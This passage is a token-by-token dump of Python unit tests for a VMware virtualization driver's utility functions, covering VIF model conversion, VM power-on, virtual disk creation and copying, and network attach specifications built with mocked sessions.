name|'config_spec'
op|','
string|"'res-pool'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'found'
op|'['
number|'0'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_convert_vif_model
dedent|''
name|'def'
name|'test_convert_vif_model'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'expected'
op|'='
string|'"VirtualE1000"'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'convert_vif_model'
op|'('
name|'network_model'
op|'.'
name|'VIF_MODEL_E1000'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
name|'expected'
op|'='
string|'"VirtualE1000e"'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'convert_vif_model'
op|'('
name|'network_model'
op|'.'
name|'VIF_MODEL_E1000E'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
name|'types'
op|'='
op|'['
string|'"VirtualE1000"'
op|','
string|'"VirtualE1000e"'
op|','
string|'"VirtualPCNet32"'
op|','
nl|'\n'
string|'"VirtualVmxnet"'
op|','
string|'"VirtualVmxnet3"'
op|']'
newline|'\n'
name|'for'
name|'type'
name|'in'
name|'types'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'type'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'convert_vif_model'
op|'('
name|'type'
op|')'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'Invalid'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'convert_vif_model'
op|','
nl|'\n'
string|'"InvalidVifModel"'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_power_on_instance_with_vm_ref
dedent|''
name|'def'
name|'test_power_on_instance_with_vm_ref'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_call_method"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_wait_for_task"'
op|')'
op|','
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'power_on_instance'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
name|'vm_ref'
op|'='
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOnVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_power_on_instance_without_vm_ref
dedent|''
dedent|''
name|'def'
name|'test_power_on_instance_without_vm_ref'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|'"get_vm_ref"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-vm-ref'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_call_method"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_wait_for_task"'
op|')'
op|','
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_get_vm_ref'
op|','
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'power_on_instance'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|')'
newline|'\n'
name|'fake_get_vm_ref'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOnVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_power_on_instance_with_exception
dedent|''
dedent|''
name|'def'
name|'test_power_on_instance_with_exception'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_call_method"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_wait_for_task"'
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'exception'
op|'.'
name|'NovaException'
op|'('
string|"'fake'"
op|')'
op|')'
op|','
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'NovaException'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'power_on_instance'
op|','
nl|'\n'
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
name|'vm_ref'
op|'='
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOnVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_power_on_instance_with_power_state_exception
dedent|''
dedent|''
name|'def'
name|'test_power_on_instance_with_power_state_exception'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_call_method"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
nl|'\n'
name|'session'
op|','
string|'"_wait_for_task"'
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'vexc'
op|'.'
name|'InvalidPowerStateException'
op|')'
op|','
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'power_on_instance'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
name|'vm_ref'
op|'='
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOnVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_virtual_disk
dedent|''
dedent|''
name|'def'
name|'test_create_virtual_disk'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'dm'
op|'='
name|'session'
op|'.'
name|'vim'
op|'.'
name|'service_content'
op|'.'
name|'virtualDiskManager'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|'"get_vmdk_create_spec"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-spec'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_call_method"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_wait_for_task"'
op|')'
op|','
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_get_spec'
op|','
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'create_virtual_disk'
op|'('
name|'session'
op|','
string|"'fake-dc-ref'"
op|','
nl|'\n'
string|"'fake-adapter-type'"
op|','
string|"'fake-disk-type'"
op|','
nl|'\n'
string|"'fake-path'"
op|','
number|'7'
op|')'
newline|'\n'
name|'fake_get_spec'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'session'
op|'.'
name|'vim'
op|'.'
name|'client'
op|'.'
name|'factory'
op|','
number|'7'
op|','
nl|'\n'
string|"'fake-adapter-type'"
op|','
nl|'\n'
string|"'fake-disk-type'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"CreateVirtualDisk_Task"'
op|','
nl|'\n'
name|'dm'
op|','
nl|'\n'
name|'name'
op|'='
string|"'fake-path'"
op|','
nl|'\n'
name|'datacenter'
op|'='
string|"'fake-dc-ref'"
op|','
nl|'\n'
name|'spec'
op|'='
string|"'fake-spec'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_copy_virtual_disk
dedent|''
dedent|''
name|'def'
name|'test_copy_virtual_disk'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'dm'
op|'='
name|'session'
op|'.'
name|'vim'
op|'.'
name|'service_content'
op|'.'
name|'virtualDiskManager'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_call_method"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_wait_for_task"'
op|')'
op|','
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'copy_virtual_disk'
op|'('
name|'session'
op|','
string|"'fake-dc-ref'"
op|','
nl|'\n'
string|"'fake-source'"
op|','
string|"'fake-dest'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"CopyVirtualDisk_Task"'
op|','
nl|'\n'
name|'dm'
op|','
nl|'\n'
name|'sourceName'
op|'='
string|"'fake-source'"
op|','
nl|'\n'
name|'sourceDatacenter'
op|'='
string|"'fake-dc-ref'"
op|','
nl|'\n'
name|'destName'
op|'='
string|"'fake-dest'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|_create_fake_vm_objects
dedent|''
dedent|''
name|'def'
name|'_create_fake_vm_objects'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'VirtualMachine'
op|'('
op|')'
op|')'
newline|'\n'
name|'return'
name|'fake_objects'
newline|'\n'
nl|'\n'
DECL|member|test_reconfigure_vm
dedent|''
name|'def'
name|'test_reconfigure_vm'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake_reconfigure_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_call_method'
op|','
name|'_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'reconfigure_vm'
op|'('
name|'session'
op|','
string|"'fake-ref'"
op|','
string|"'fake-spec'"
op|')'
newline|'\n'
name|'_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'mock'
op|'.'
name|'ANY'
op|','
nl|'\n'
string|"'ReconfigVM_Task'"
op|','
string|"'fake-ref'"
op|','
name|'spec'
op|'='
string|"'fake-spec'"
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
string|"'fake_reconfigure_task'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|_get_network_attach_config_spec_opaque
dedent|''
dedent|''
name|'def'
name|'_get_network_attach_config_spec_opaque'
op|'('
name|'self'
op|','
name|'network_ref'
op|','
nl|'\n'
name|'vc6_onwards'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
op|'{'
string|"'network_name'"
op|':'
string|"'fake-name'"
op|','
nl|'\n'
string|"'mac_address'"
op|':'
string|"'00:00:00:ca:fe:01'"
op|','
nl|'\n'
string|"'network_ref'"
op|':'
name|'network_ref'
op|','
nl|'\n'
string|"'iface_id'"
op|':'
number|'7'
op|','
nl|'\n'
string|"'vif_model'"
op|':'
string|"'VirtualE1000'"
op|'}'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_network_attach_config_spec'
op|'('
nl|'\n'
name|'fake_factory'
op|','
name|'vif_info'
op|','
number|'1'
op|')'
newline|'\n'
name|'card'
op|'='
string|"'ns0:VirtualEthernetCardOpaqueNetworkBackingInfo'"
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'vif_info'
op|'['
string|"'iface_id'"
op|']'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.iface-id.1'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'device_change'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|')'
newline|'\n'
name|'device_change'
op|'.'
name|'operation'
op|'='
string|"'add'"
newline|'\n'
nl|'\n'
name|'device'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualE1000'"
op|')'
newline|'\n'
name|'device'
op|'.'
name|'macAddress'
op|'='
name|'vif_info'
op|'['
string|"'mac_address'"
op|']'
newline|'\n'
name|'if'
name|'network_ref'
op|'['
string|"'use-external-id'"
op|']'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'vc6_onwards'
op|':'
newline|'\n'
indent|' '
name|'device'
op|'.'
name|'externalId'
op|'='
name|'vif_info'
op|'['
string|"'iface_id'"
op|']'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'dp'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:DynamicProperty'"
op|')'
newline|'\n'
name|'dp'
op|'.'
name|'name'
op|'='
string|"'__externalId__'"
newline|'\n'
name|'dp'
op|'.'
name|'val'
op|'='
name|'vif_info'
op|'['
string|"'iface_id'"
op|']'
newline|'\n'
name|'device'
op|'.'
name|'dynamicProperty'
op|'='
op|'['
name|'dp'
op|']'
newline|'\n'
dedent|''
dedent|''
name|'device'
op|'.'
name|'addressType'
op|'='
string|"'manual'"
newline|'\n'
name|'connectable'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConnectInfo'"
op|')'
newline|'\n'
name|'connectable'
op|'.'
name|'allowGuestControl'
op|'='
name|'True'
newline|'\n'
name|'connectable'
op|'.'
name|'startConnected'
op|'='
name|'True'
newline|'\n'
name|'connectable'
op|'.'
name|'connected'
op|'='
name|'True'
newline|'\n'
name|'device'
op|'.'
name|'connectable'
op|'='
name|'connectable'
newline|'\n'
name|'backing'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
name|'card'
op|')'
newline|'\n'
name|'backing'
op|'.'
name|'opaqueNetworkType'
op|'='
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'['
string|"'network-type'"
op|']'
newline|'\n'
name|'backing'
op|'.'
name|'opaqueNetworkId'
op|'='
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'['
string|"'network-id'"
op|']'
newline|'\n'
name|'device'
op|'.'
name|'backing'
op|'='
name|'backing'
newline|'\n'
name|'device'
op|'.'
name|'key'
op|'='
op|'-'
number|'47'
newline|'\n'
name|'device'
op|'.'
name|'wakeOnLanEnabled'
op|'='
name|'True'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'='
name|'device'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'.'
name|'append'
op|'('
name|'device_change'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_network_attach_config_spec_opaque_integration_bridge
dedent|''
name|'def'
name|'test_get_network_attach_config_spec_opaque_integration_bridge'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'network_ref'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'OpaqueNetwork'"
op|','
nl|'\n'
string|"'network-id'"
op|':'
string|"'fake-network-id'"
op|','
nl|'\n'
string|"'network-type'"
op|':'
string|"'opaque'"
op|','
nl|'\n'
string|"'use-external-id'"
op|':'
name|'False'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'_get_network_attach_config_spec_opaque'
op|'('
name|'network_ref'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_network_attach_config_spec_opaque
dedent|''
name|'def'
name|'test_get_network_attach_config_spec_opaque'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'network_ref'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'OpaqueNetwork'"
op|','
nl|'\n'
string|"'network-id'"
op|':'
string|"'fake-network-id'"
op|','
nl|'\n'
string|"'network-type'"
op|':'
string|"'nsx.LogicalSwitch'"
op|','
nl|'\n'
string|"'use-external-id'"
op|':'
name|'True'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'_get_network_attach_config_spec_opaque'
op|'('
name|'network_ref'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'fake'
op|','
string|"'DataObject'"
op|')'
newline|'\n'
DECL|member|test_get_network_attach_config_spec_opaque_vc6_onwards
name|'def'
name|'test_get_network_attach_config_spec_opaque_vc6_onwards'
op|'('
name|'self'
op|','
nl|'\n'
name|'mock_object'
op|')'
op|':'
newline|'\n'
comment|'# Add new attribute externalId supported from VC6'
nl|'\n'
DECL|class|FakeVirtualE1000
indent|' '
name|'class'
name|'FakeVirtualE1000'
op|'('
name|'fake'
op|'.'
name|'DataObject'
op|')'
op|':'
newline|'\n'
DECL|member|__init__
indent|' '
name|'def'
name|'__init__'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'FakeVirtualE1000'
op|','
name|'self'
op|')'
op|'.'
name|'__init__'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'externalId'
op|'='
name|'None'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'mock_object'
op|'.'
name|'return_value'
op|'='
name|'FakeVirtualE1000'
newline|'\n'
name|'network_ref'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'OpaqueNetwork'"
op|','
nl|'\n'
string|"'network-id'"
op|':'
string|"'fake-network-id'"
op|','
nl|'\n'
string|"'network-type'"
op|':'
string|"'nsx.LogicalSwitch'"
op|','
nl|'\n'
string|"'use-external-id'"
op|':'
name|'True'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'_get_network_attach_config_spec_opaque'
op|'('
name|'network_ref'
op|','
nl|'\n'
name|'vc6_onwards'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_network_attach_config_spec_dvs
dedent|''
name|'def'
name|'test_get_network_attach_config_spec_dvs'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
op|'{'
string|"'network_name'"
op|':'
string|"'br100'"
op|','
nl|'\n'
string|"'mac_address'"
op|':'
string|"'00:00:00:ca:fe:01'"
op|','
nl|'\n'
string|"'network_ref'"
op|':'
op|'{'
string|"'type'"
op|':'
string|"'DistributedVirtualPortgroup'"
op|','
nl|'\n'
string|"'dvsw'"
op|':'
string|"'fake-network-id'"
op|','
nl|'\n'
string|"'dvpg'"
op|':'
string|"'fake-group'"
op|'}'
op|','
nl|'\n'
string|"'iface_id'"
op|':'
number|'7'
op|','
nl|'\n'
string|"'vif_model'"
op|':'
string|"'VirtualE1000'"
op|'}'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_network_attach_config_spec'
op|'('
nl|'\n'
name|'fake_factory'
op|','
name|'vif_info'
op|','
number|'1'
op|')'
newline|'\n'
name|'port'
op|'='
string|"'ns0:DistributedVirtualSwitchPortConnection'"
newline|'\n'
name|'backing'
op|'='
string|"'ns0:VirtualEthernetCardDistributedVirtualPortBackingInfo'"
newline|'\n'
nl|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'vif_info'
op|'['
string|"'iface_id'"
op|']'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.iface-id.1'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'device_change'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|')'
newline|'\n'
name|'device_change'
op|'.'
name|'operation'
op|'='
string|"'add'"
newline|'\n'
nl|'\n'
name|'device'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualE1000'"
op|')'
newline|'\n'
name|'device'
op|'.'
name|'macAddress'
op|'='
name|'vif_info'
op|'['
string|"'mac_address'"
op|']'
newline|'\n'
name|'device'
op|'.'
name|'key'
op|'='
op|'-'
number|'47'
newline|'\n'
name|'device'
op|'.'
name|'addressType'
op|'='
string|"'manual'"
newline|'\n'
name|'device'
op|'.'
name|'wakeOnLanEnabled'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'device'
op|'.'
name|'backing'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
name|'backing'
op|')'
newline|'\n'
name|'device'
op|'.'
name|'backing'
op|'.'
name|'port'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
name|'port'
op|')'
newline|'\n'
name|'device'
op|'.'
name|'backing'
op|'.'
name|'port'
op|'.'
name|'portgroupKey'
op|'='
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'['
string|"'dvpg'"
op|']'
newline|'\n'
name|'device'
op|'.'
name|'backing'
op|'.'
name|'port'
op|'.'
name|'switchUuid'
op|'='
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'['
string|"'dvsw'"
op|']'
newline|'\n'
nl|'\n'
name|'connectable'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConnectInfo'"
op|')'
newline|'\n'
name|'connectable'
op|'.'
name|'allowGuestControl'
op|'='
name|'True'
newline|'\n'
name|'connectable'
op|'.'
name|'connected'
op|'='
name|'True'
newline|'\n'
name|'connectable'
op|'.'
name|'startConnected'
op|'='
name|'True'
newline|'\n'
name|'device'
op|'.'
name|'connectable'
op|'='
name|'connectable'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'='
name|'device'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'.'
name|'append'
op|'('
name|'device_change'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_get_create_vif_spec
dedent|''
name|'def'
name|'_get_create_vif_spec'
op|'('
name|'self'
op|','
name|'fake_factory'
op|','
name|'vif_info'
op|')'
op|':'
newline|'\n'
indent|' '
name|'limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
op|')'
newline|'\n'
name|'limits'
op|'.'
name|'limit'
op|'='
number|'10'
newline|'\n'
name|'limits'
op|'.'
name|'reservation'
op|'='
number|'20'
newline|'\n'
name|'limits'
op|'.'
name|'shares_level'
op|'='
string|"'custom'"
newline|'\n'
name|'limits'
op|'.'
name|'shares_share'
op|'='
number|'40'
newline|'\n'
name|'return'
name|'vm_util'
op|'.'
name|'_create_vif_spec'
op|'('
name|'fake_factory'
op|','
name|'vif_info'
op|','
name|'limits'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_construct_vif_spec
dedent|''
name|'def'
name|'_construct_vif_spec'
op|'('
name|'self'
op|','
name|'fake_factory'
op|','
name|'vif_info'
op|')'
op|':'
newline|'\n'
indent|' '
name|'port'
op|'='
string|"'ns0:DistributedVirtualSwitchPortConnection'"
newline|'\n'
name|'backing'
op|'='
string|"'ns0:VirtualEthernetCardDistributedVirtualPortBackingInfo'"
newline|'\n'
nl|'\n'
name|'device_change'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|')'
newline|'\n'
name|'device_change'
op|'.'
name|'operation'
op|'='
string|"'add'"
newline|'\n'
nl|'\n'
name|'device'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualE1000'"
op|')'
newline|'\n'
name|'device'
op|'.'
name|'macAddress'
op|'='
name|'vif_info'
op|'['
string|"'mac_address'"
op|']'
newline|'\n'
name|'device'
op|'.'
name|'key'
op|'='
op|'-'
number|'47'
newline|'\n'
name|'device'
op|'.'
name|'addressType'
op|'='
string|"'manual'"
newline|'\n'
name|'device'
op|'.'
name|'wakeOnLanEnabled'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'device'
op|'.'
name|'backing'
